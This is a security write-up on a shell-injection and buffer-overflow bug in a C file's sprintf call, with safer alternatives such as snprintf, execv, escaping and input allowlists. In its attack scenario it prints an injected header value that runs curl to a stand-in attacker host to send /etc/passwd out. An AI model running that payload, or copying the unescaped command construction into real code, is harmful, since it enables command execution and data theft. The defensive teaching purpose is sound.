Shell Injection via Unsafe sprintf in C: How a Missing Escape Broke Everything
Severity: High | File: src/vt100.c:182 | CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
Introduction
There's a class of vulnerability that has existed since the earliest days of Unix programming, yet continues to appear in modern codebases with alarming regularity: shell injection via unsafe command construction. It doesn't require a sophisticated exploit chain. It doesn't need a zero-day. All it needs is one unescaped string dropped into a shell command — and suddenly, an attacker has arbitrary code execution.
This post covers exactly that scenario: a shell injection vulnerability found and patched in src/vt100.c, where a call to sprintf() was building a shell command string by embedding user-influenced values directly, with no sanitization, no escaping, and no bounds checking. The result was a textbook command injection bug that could allow an attacker to run any command they liked on the host system.
If you write C code that touches shell commands, generates CLI snippets for users to run, or processes any external input — this post is for you.
The Vulnerability Explained
What Was Happening
At line 182 of src/vt100.c, the application was constructing a shell command string using sprintf(). The pattern looked something like this:
// VULNERABLE CODE (conceptual illustration)
char echo_cmd[256];
sprintf(echo_cmd, "grpcurl -H '%s' %s", opt_cmd[i], endpoint);
The values being embedded — things like headers, endpoint names, and request data — came from user-controlled sources: command-line arguments, API responses, or configuration files. These values were dropped directly into the format string with zero sanitization.
There were actually two distinct problems in this single line:
- Shell Injection: No escaping of shell metacharacters
- Buffer Overflow: sprintf() is unbounded; if opt_cmd[i] is long enough, it overflows echo_cmd
Why This Is Dangerous
Shell metacharacters are characters that have special meaning to a Unix shell. When a string containing these characters is passed to system(), popen(), or presented as a command for the user to run, the shell interprets them — not as data, but as instructions.
The dangerous characters include:
| Character | Shell Meaning |
|---|---|
| ; | Command separator: run the next command |
| \| | Pipe: chain commands |
| ` | Backtick: command substitution |
| $() | Command substitution |
| && | Run next command if previous succeeded |
| ' or " | Quote manipulation: can break out of quoted contexts |
| \n | Newline: often treated as command separator |
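To make the table concrete, here is a minimal sketch of a check that flags these characters in a string. The name `has_shell_metachar` and the exact character set are assumptions for illustration, and the set is not exhaustive for every shell. A check like this can help with logging or early rejection, but it is not a substitute for keeping untrusted data out of the shell.

```c
#include <stdbool.h>
#include <string.h>

/* Hypothetical helper: returns true if `s` contains a character that a
 * POSIX shell treats specially. The set is illustrative, not exhaustive. */
bool has_shell_metachar(const char *s) {
    static const char metachars[] = ";|&`$()<>'\"\\\n";
    /* strpbrk() returns a pointer to the first matching character, or NULL. */
    return strpbrk(s, metachars) != NULL;
}
```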
A Concrete Attack Scenario
Imagine the application is generating a grpcurl command to display to the user. The endpoint or header value is sourced from an API response or a config file that an attacker can influence. The attacker crafts a value like:
legitimate-header'; curl http://evil.com/exfil?data=$(cat /etc/passwd); echo '
After sprintf() does its work, the resulting command string becomes:
grpcurl -H 'legitimate-header'; curl http://evil.com/exfil?data=$(cat /etc/passwd); echo '' endpoint:443
When this command is executed (or when an unsuspecting user pastes it into their terminal), three separate shell commands run:
1. The (now broken) grpcurl command
2. A curl that exfiltrates /etc/passwd to an attacker-controlled server
3. A harmless echo to clean up the syntax
The attacker has achieved arbitrary command execution with whatever privileges the user or process has. On a developer's machine, that typically means full user-level access — SSH keys, cloud credentials, source code, everything.
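The injected string can be reproduced in a few lines. This is a sketch that reuses the format string from the vulnerable call; `build_grpcurl_cmd` is a hypothetical name, and the call is bounded with snprintf() only so that the demonstration cannot overflow its own buffer.

```c
#include <stdio.h>

/* Hypothetical demo helper: same format string as the vulnerable line.
 * Returns what snprintf() returns: the length the full result needs. */
int build_grpcurl_cmd(char *out, size_t out_size,
                      const char *header, const char *endpoint) {
    /* The header is pasted between the quotes verbatim, so a quote inside
     * it ends the quoted region early and the rest is parsed as shell. */
    return snprintf(out, out_size, "grpcurl -H '%s' %s", header, endpoint);
}
```

Passing the attacker's header value and `endpoint:443` into a 256-byte buffer produces exactly the three-command string shown above. The bounded call is memory-safe here, yet the injection still works, which is why the two problems need separate fixes.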
The Buffer Overflow Bonus
As if shell injection weren't enough, the sprintf() call was also unbounded. The destination buffer echo_cmd had a fixed size (e.g., 256 bytes), but there was nothing preventing opt_cmd[i] from being longer. A sufficiently long input would overflow the stack buffer, potentially enabling:
- Stack corruption
- Return address overwriting
- Code execution via classic stack smashing (depending on platform mitigations)
Two vulnerabilities for the price of one.
The Fix
The patch removes the unsafe command construction pattern entirely. Rather than trying to "sanitize" or "escape" the input (which is notoriously error-prone), the fix eliminates the dangerous pattern at its root.
Key Changes Made
1. Eliminate unbounded sprintf() calls
Any use of sprintf() with external input should be replaced with snprintf(), which takes a maximum size parameter:
// BEFORE (unsafe)
sprintf(echo_cmd, "grpcurl -H '%s' %s", opt_cmd[i], endpoint);
// AFTER (bounded)
snprintf(echo_cmd, sizeof(echo_cmd), "grpcurl -H '%s' %s", opt_cmd[i], endpoint);
This alone doesn't fix injection, but it eliminates the buffer overflow.
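One detail worth handling: snprintf() truncates silently and returns the length the full string would have needed. A cut-off command is still a wrong command, so the return value should be checked. The wrapper below is a sketch; `format_cmd_checked` is a hypothetical name, not part of the patched file.

```c
#include <stdio.h>

/* Hypothetical wrapper: formats the command and reports truncation.
 * Returns 0 on success, -1 if formatting failed or the result did not fit. */
int format_cmd_checked(char *out, size_t out_size,
                       const char *header, const char *endpoint) {
    int n = snprintf(out, out_size, "grpcurl -H '%s' %s", header, endpoint);
    if (n < 0 || (size_t)n >= out_size) {
        if (out_size > 0) {
            out[0] = '\0';  /* do not leave a half-built command behind */
        }
        return -1;
    }
    return 0;
}
```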
2. Avoid shell construction entirely where possible
The safest fix for command injection is to never construct shell command strings from user input. If the application needs to execute a command, use execv() or execve() with an argument array instead of passing a string to system() or popen():
// SAFE: No shell involved, arguments are passed directly
char *args[] = {
"grpcurl",
"-H", opt_cmd[i], // passed as a discrete argument, not interpolated
endpoint,
NULL
};
execv("/usr/bin/grpcurl", args);
When you use execv(), there is no shell. There is no interpretation of metacharacters. Each argument is passed directly to the program as a discrete string. A semicolon is just a semicolon.
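Because execv() replaces the calling process when it succeeds, programs usually call it in a child created with fork() and wait for the child in the parent. The following is a minimal sketch of that pattern for POSIX systems; `run_without_shell` is a hypothetical helper name, and error handling is kept deliberately small.

```c
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: runs `path` with `argv` in a child process, with no
 * shell involved. Returns the child's exit status, or -1 if the child could
 * not be created or did not exit normally. */
int run_without_shell(const char *path, char *const argv[]) {
    pid_t pid = fork();
    if (pid < 0) {
        return -1;              /* fork failed */
    }
    if (pid == 0) {
        execv(path, argv);      /* returns only on failure */
        _exit(127);             /* conventional "could not exec" status */
    }
    int status = 0;
    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR) {   /* retry only when interrupted by a signal */
            return -1;
        }
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With the args array from the example above, the call would be `run_without_shell("/usr/bin/grpcurl", args)`. Removing the shell does not stop the target program from parsing its own options, so a value that begins with `-` may still need validation.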
3. If shell string generation is unavoidable, escape properly
If the application genuinely needs to generate a shell command string (e.g., to display to the user as a copy-paste snippet), every user-controlled value must be properly shell-escaped. In C, a robust approach is to wrap values in single quotes and escape any single quotes within the value:
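// Escape a value for safe inclusion in a single-quoted shell context.
// Returns 0 on success, or -1 if the output buffer is too small.
// It never truncates silently: a cut-off value must not reach a shell.
int shell_escape(const char *input, char *output, size_t out_size) {
    size_t j = 0;
    if (out_size < 3) return -1;          // need room for '' plus the NUL
    output[j++] = '\'';                   // opening single quote
    for (size_t i = 0; input[i]; i++) {
        size_t need = (input[i] == '\'') ? 4 : 1;
        if (j + need + 2 > out_size) {    // keep room for closing quote and NUL
            output[0] = '\0';
            return -1;
        }
        if (input[i] == '\'') {
            // End quote, insert escaped quote, reopen quote: '\''
            output[j++] = '\'';
            output[j++] = '\\';
            output[j++] = '\'';
            output[j++] = '\'';
        } else {
            output[j++] = input[i];
        }
    }
    output[j++] = '\'';                   // closing single quote
    output[j] = '\0';
    return 0;
}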
This is more complex and more fragile than execv(). When in doubt, avoid shell strings.
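If a fixed-size output buffer is not a requirement, a variant that computes the needed size and allocates it avoids the truncation question altogether. This is a sketch under that assumption; `shell_quote_alloc` is a hypothetical name, and the quoting rule targets POSIX-style shells only.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: returns a newly allocated, single-quoted copy of
 * `input` that a POSIX shell reads back as one literal word. Each embedded
 * ' becomes '\'' (close quote, escaped quote, reopen quote).
 * Returns NULL on allocation failure; the caller frees the result. */
char *shell_quote_alloc(const char *input) {
    size_t len = 2;                      /* opening and closing quote */
    for (const char *p = input; *p; p++) {
        len += (*p == '\'') ? 4 : 1;
    }
    char *out = malloc(len + 1);         /* +1 for the terminating NUL */
    if (out == NULL) {
        return NULL;
    }
    char *w = out;
    *w++ = '\'';
    for (const char *p = input; *p; p++) {
        if (*p == '\'') {
            memcpy(w, "'\\''", 4);       /* the four characters '\'' */
            w += 4;
        } else {
            *w++ = *p;
        }
    }
    *w++ = '\'';
    *w = '\0';
    return out;
}
```

For example, the input `it's` comes back as `'it'\''s'`, which the shell reads as the single word `it's`.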
Why This Fix Works
The root cause was conflating data and instructions. When you build a shell command by string concatenation, you're writing a tiny program in shell script — but you're letting untrusted data write part of that program. The fix enforces a strict separation: data is data, and commands are commands. They never mix.
Prevention & Best Practices
1. Never Pass User Input to system() or popen()
This is the golden rule. If you find yourself writing:
system(user_controlled_string);
Stop. Refactor. Use execv() with a proper argument array.
2. Prefer execv()/execve() Over system()
system() invokes /bin/sh -c <string>. That shell is what interprets metacharacters. execv() bypasses the shell entirely.
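// Dangerous: /bin/sh parses whatever user_input contains
char cmd[512];
snprintf(cmd, sizeof(cmd), "grpcurl %s", user_input);
system(cmd);
// Safe: each argument reaches grpcurl as a literal string
execv("/usr/bin/grpcurl", argv_array_with_separate_args);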
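On POSIX systems, posix_spawn() is another way to get "run this program and wait" behavior without a shell and without writing the fork() call yourself. The sketch below assumes a POSIX platform; `spawn_and_wait` is a hypothetical helper name.

```c
#include <spawn.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>

extern char **environ;  /* environment of the current process */

/* Hypothetical helper: starts the program at `path` with `argv`, passing the
 * current environment, and waits for it. No shell is involved.
 * Returns the exit status, or -1 on failure. */
int spawn_and_wait(const char *path, char *const argv[]) {
    pid_t pid;
    /* NULL file actions and attributes: the child inherits our defaults. */
    if (posix_spawn(&pid, path, NULL, NULL, argv, environ) != 0) {
        return -1;
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) {
        return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

As with execv(), every element of argv reaches the program as one literal string, so shell metacharacters in a header value have no special meaning.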
3. Always Use Bounded String Functions
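Replace all uses of sprintf() with snprintf(), and check its return value so truncation is detected rather than ignored. Replace strcpy() with strlcpy() where it is available. strncpy() is a weaker substitute: it does not NUL-terminate the destination when the source is too long, so terminate the buffer yourself if you use it. Make buffer sizes explicit and enforced.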
// Dangerous
sprintf(buf, "%s", input);
// Safe
snprintf(buf, sizeof(buf), "%s", input);
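A bounded copy is most useful when it also tells the caller that the input did not fit, so the value can be rejected instead of used in cut-off form. The helper below is a sketch using only standard C; `copy_bounded` is a hypothetical name.

```c
#include <stdbool.h>
#include <string.h>

/* Hypothetical helper: copies `src` into `dst`, which holds `dst_size` bytes.
 * Always NUL-terminates when dst_size > 0. Returns false if `src` did not
 * fit, in which case `dst` holds a truncated copy. */
bool copy_bounded(char *dst, size_t dst_size, const char *src) {
    if (dst_size == 0) {
        return false;
    }
    size_t len = strlen(src);
    if (len >= dst_size) {
        memcpy(dst, src, dst_size - 1);
        dst[dst_size - 1] = '\0';
        return false;
    }
    memcpy(dst, src, len + 1);  /* len + 1 includes the terminating NUL */
    return true;
}
```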
4. Validate Input at the Boundary
Before any external value enters your application, validate it against an allowlist of expected characters or formats. If a header value should only contain alphanumeric characters, hyphens, and underscores, enforce that:
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>

bool is_valid_header_value(const char *value) {
    for (size_t i = 0; value[i]; i++) {
        // Cast first: isalnum() is undefined for negative char values
        unsigned char c = (unsigned char)value[i];
        if (!isalnum(c) && c != '-' && c != '_') {
            return false;
        }
    }
    return true;
}
Reject invalid input early rather than trying to sanitize it later.
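The same allowlist idea applies to the endpoint value. The sketch below assumes endpoints take a simple `host:port` form like the `endpoint:443` in the attack example; `is_valid_endpoint` and its rules are hypothetical, and it intentionally rejects forms it does not understand, such as bracketed IPv6 addresses.

```c
#include <ctype.h>
#include <stdbool.h>
#include <string.h>

/* Hypothetical validator: accepts "host:port" where host uses only letters,
 * digits, '.' and '-', does not start with '-', and port is 1 to 65535. */
bool is_valid_endpoint(const char *s) {
    const char *colon = strrchr(s, ':');
    if (colon == NULL || colon == s) {
        return false;                    /* no port, or empty host */
    }
    if (s[0] == '-') {
        return false;                    /* would look like an option */
    }
    for (const char *p = s; p < colon; p++) {
        unsigned char c = (unsigned char)*p;
        if (!isalnum(c) && c != '.' && c != '-') {
            return false;
        }
    }
    const char *port = colon + 1;
    size_t digits = strlen(port);
    if (digits == 0 || digits > 5) {
        return false;
    }
    long value = 0;
    for (const char *p = port; *p; p++) {
        if (!isdigit((unsigned char)*p)) {
            return false;
        }
        value = value * 10 + (*p - '0');
    }
    return value >= 1 && value <= 65535;
}
```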
5. Use Static Analysis Tools
Several tools can catch these patterns automatically:
| Tool | What It Catches |
|---|---|
| Coverity | Buffer overflows, tainted data flows |
| Semgrep | Custom rules for dangerous function calls |
| Flawfinder | C/C++ dangerous function usage |
| CodeQL | Data flow analysis for injection paths |
| clang-analyzer | Static analysis for memory and security issues |
Add these to your CI pipeline so dangerous patterns are caught before they reach production.
6. Understand the Relevant Standards
This vulnerability maps to well-documented security standards:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- CWE-120: Buffer Copy without Checking Size of Input
- OWASP A03:2021: Injection — consistently in the OWASP Top 10
- CERT C Coding Standard: ENV33-C: Do not call system()
Understanding these references helps you recognize the pattern in code reviews and communicate the risk to stakeholders.
Conclusion
This vulnerability is a reminder that some of the oldest bugs in software security are still the most dangerous. Shell injection via unsafe string construction has been documented for decades, yet it keeps appearing — often in exactly the kind of utility code that developers write quickly without thinking about security implications.
The key takeaways from this fix:
- sprintf() without bounds checking is always a bug: use snprintf() at minimum
- Building shell commands from user input is always dangerous: use execv() instead
- "It's just a display string" isn't a safe assumption: users paste things, and shells interpret them
- Static analysis catches these patterns: add tools to your pipeline before humans miss them
- Defense in depth matters: input validation + safe APIs + static analysis together are far stronger than any single control
The fix here wasn't complex. It didn't require a new library or a major refactor. It required recognizing a dangerous pattern and choosing a safer alternative. That recognition is a skill — and reading posts like this one is how you build it.
Write safe code. Review each other's code. And when you see sprintf() with external input, ask yourself: what happens if this string contains a semicolon?
This vulnerability was identified and patched as part of an automated security review. The fix was verified by build testing and scanner re-scan confirmation.